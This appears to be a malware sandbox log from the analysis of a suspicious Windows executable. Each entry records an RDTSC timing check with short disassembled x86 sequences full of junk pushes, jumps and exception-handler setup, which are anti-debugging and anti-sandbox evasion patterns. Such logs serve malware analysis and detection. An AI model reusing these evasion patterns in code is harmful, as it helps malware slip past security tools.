Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA5B6B second address: FA5B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F36B8D8D086h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA5B79 second address: FA5BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, 6764C4B4h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F36B8869BF8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e xor ebx, 2C6B0F7Eh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F36B8869BF8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov ebx, dword ptr [ebp+122D2C33h] 0x00000056 mov ebx, esi 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA5BFA second address: FA5BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA6BF5 second address: FA6C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA7C46 second address: FA7C69 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36B8D8D091h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36B8D8D08Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA6DE4 second address: FA6DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FABD17 second address: FABD2C instructions: 0x00000000 rdtsc 0x00000002 je 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FABD2C second address: FABD41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FACDFB second address: FACE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FACE00 second address: FACE05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FACEB8 second address: FACEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FAEFAF second address: FAEFD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F36B8869BFFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB0EC1 second address: FB0ED2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FAEFD8 second address: FAEFE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FADE2F second address: FADEC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c mov edi, 5AABC1D4h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov ebx, 70E6863Ah 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F36B8D8D088h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov di, 0E92h 0x00000042 mov eax, dword ptr [ebp+122D0715h] 0x00000048 push 00000000h 0x0000004a push eax 0x0000004b call 00007F36B8D8D088h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc eax 0x0000005e push eax 0x0000005f ret 0x00000060 pop eax 0x00000061 ret 0x00000062 jmp 00007F36B8D8D099h 0x00000067 push FFFFFFFFh 0x00000069 xor dword ptr [ebp+122D20D3h], ecx 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 push esi 0x00000074 pop esi 0x00000075 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB2E97 second address: FB2EC5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8869BFAh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e je 00007F36B8869BF8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36B8869C01h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB5020 second address: FB5024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB5024 second address: FB506C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F36B8869BF6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F36B8869C02h 0x00000012 nop 0x00000013 pushad 0x00000014 mov ah, 85h 0x00000016 mov dword ptr [ebp+122D3068h], eax 0x0000001c popad 0x0000001d push 00000000h 0x0000001f mov ebx, 626EAB02h 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1DBFh], edi 0x0000002c xchg eax, esi 0x0000002d jbe 00007F36B8869C08h 0x00000033 push eax 0x00000034 push edx 0x00000035 jng 00007F36B8869BF6h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB506C second address: FB5081 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jbe 00007F36B8D8D086h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB52CB second address: FB52CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB729A second address: FB729E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB729E second address: FB72A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB84F4 second address: FB84F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB84F8 second address: FB8556 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F36B8869BFEh 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F36B8869BF6h 0x00000016 jng 00007F36B8869C1Ah 0x0000001c jmp 00007F36B8869C01h 0x00000021 jmp 00007F36B8869C03h 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007F36B8869BF6h 0x0000002e jmp 00007F36B8869C06h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FB8556 second address: FB8567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FBE3AD second address: FBE3F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFEh 0x00000007 pushad 0x00000008 ja 00007F36B8869BF6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F36B8869C01h 0x0000001a jmp 00007F36B8869C08h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC2A47 second address: FC2A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC2B15 second address: FC2B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC75FA second address: FC7600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC7600 second address: FC7608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC7D55 second address: FC7DC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F36B8D8D086h 0x00000008 jmp 00007F36B8D8D093h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F36B8D8D097h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jp 00007F36B8D8D086h 0x0000001e push edi 0x0000001f pop edi 0x00000020 jp 00007F36B8D8D086h 0x00000026 js 00007F36B8D8D086h 0x0000002c popad 0x0000002d jc 00007F36B8D8D0A0h 0x00000033 jmp 00007F36B8D8D098h 0x00000038 push edx 0x00000039 pop edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC7F27 second address: FC7F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC7F2B second address: FC7F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC7F2F second address: FC7F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36B8869C01h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC8353 second address: FC8359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC8359 second address: FC83AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F36B8869C0Fh 0x0000000c jne 00007F36B8869C02h 0x00000012 jng 00007F36B8869BF6h 0x00000018 ja 00007F36B8869BF6h 0x0000001e popad 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F36B8869C06h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC86A4 second address: FC86B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F36B8D8D086h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC87FB second address: FC8810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push ecx 0x0000000d jl 00007F36B8869C02h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC8810 second address: FC8816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC9EEE second address: FC9EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC9EF5 second address: FC9EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC9EFD second address: FC9F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC9F02 second address: FC9F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FC9F08 second address: FC9F30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F36B8869C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jno 00007F36B8869BF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6061E second address: F60622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F60622 second address: F6064A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F36B8869BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F36B8869C02h 0x00000010 jo 00007F36B8869BF6h 0x00000016 pop eax 0x00000017 push edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF0A6 second address: FCF0CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 jmp 00007F36B8D8D08Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF0CC second address: FCF0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF387 second address: FCF38E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF38E second address: FCF3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C00h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F36B8869BF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF3AD second address: FCF3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF52B second address: FCF544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F36B8869C03h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF7F7 second address: FCF804 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF915 second address: FCF919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF919 second address: FCF929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F36B8D8D086h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF929 second address: FCF933 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36B8869BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF933 second address: FCF949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F36B8D8D086h 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCF949 second address: FCF950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCFEBF second address: FCFF0A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8D8D09Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007F36B8D8D098h 0x00000011 jmp 00007F36B8D8D090h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F36B8D8D08Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCFF0A second address: FCFF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCFF0E second address: FCFF18 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36B8D8D086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8031A second address: F8034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F36B8869C03h 0x0000000f jbe 00007F36B8869BF6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8034F second address: F8035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8035A second address: F80360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F80360 second address: F8036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F36B8D8D08Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCECE6 second address: FCECEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FCECEA second address: FCECF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F36B8D8D092h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F51601 second address: F51605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F51605 second address: F5161C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F36B8D8D08Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FD81ED second address: FD81F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F56792 second address: F56796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9ACAA second address: F9AD56 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F36B8869C0Ah 0x00000008 jmp 00007F36B8869C04h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebx 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F36B8869BF8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov dword ptr [ebp+122D31B7h], ecx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov dword ptr [ebp+122D3327h], ecx 0x00000046 mov dword ptr [ebp+124858ACh], esp 0x0000004c pushad 0x0000004d mov dh, bh 0x0000004f mov dword ptr [ebp+122D27A6h], edx 0x00000055 popad 0x00000056 cmp dword ptr [ebp+122D2BAFh], 00000000h 0x0000005d jne 00007F36B8869CAFh 0x00000063 mov edi, dword ptr [ebp+122D29DDh] 0x00000069 mov byte ptr [ebp+122D20E7h], 00000047h 0x00000070 mov dword ptr [ebp+122D29C3h], edi 0x00000076 mov eax, D49AA7D2h 0x0000007b mov cl, 63h 0x0000007d nop 0x0000007e pushad 0x0000007f jng 00007F36B8869BFCh 0x00000085 jo 00007F36B8869BF8h 0x0000008b push edi 0x0000008c pop edi 0x0000008d popad 0x0000008e push eax 0x0000008f push eax 0x00000090 push edx 0x00000091 push edx 0x00000092 push ebx 0x00000093 pop ebx 0x00000094 pop edx 0x00000095 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9AD56 second address: F9AD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9B2C8 second address: F9B2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9B2CC second address: F9B2D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9B342 second address: F9B348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9B42A second address: F9B430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9BE81 second address: F9BE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
